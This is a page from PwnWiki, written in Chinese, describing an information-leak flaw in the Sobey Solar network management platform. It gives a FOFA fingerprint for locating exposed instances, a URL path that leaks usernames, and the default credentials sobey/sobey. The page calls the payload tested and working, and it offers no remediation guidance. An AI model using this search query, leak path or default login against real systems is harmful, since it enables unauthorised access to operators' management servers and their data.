Sobey(索贝)Solar网络管理系统信息泄漏漏洞

From PwnWiki
This page is a translated version of the page Sobey(索貝)Solar网络管理系统信息泄漏漏洞 and the translation is 100% complete.
Check.png 該漏洞已通過驗證。
本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。


Other languages:
Chinese • ‎中文(中国大陆)‎ • ‎中文(台灣)‎

简介

Solar网络管理平台又名金字塔网络管理系统,是一种统一管理所有后台配置的系统。其中包含台内系统的业务数据展示,基础数据配置、任务情况显示、日志详情查询。功能齐全、展示清晰,通过不同角色的权限控制展示相应内容,科学管理台内数据。


FOFA

"application/components_solar/loginController.js"

Payload

泄漏用户名:

http://<target>/application/components_solar/loginController.js

默认口令

sobey/sobey

Retrieved from "https://pwnwiki.com/index.php?title=Sobey(索貝)Solar网络管理系统信息泄漏漏洞/zh-cn&oldid=5743"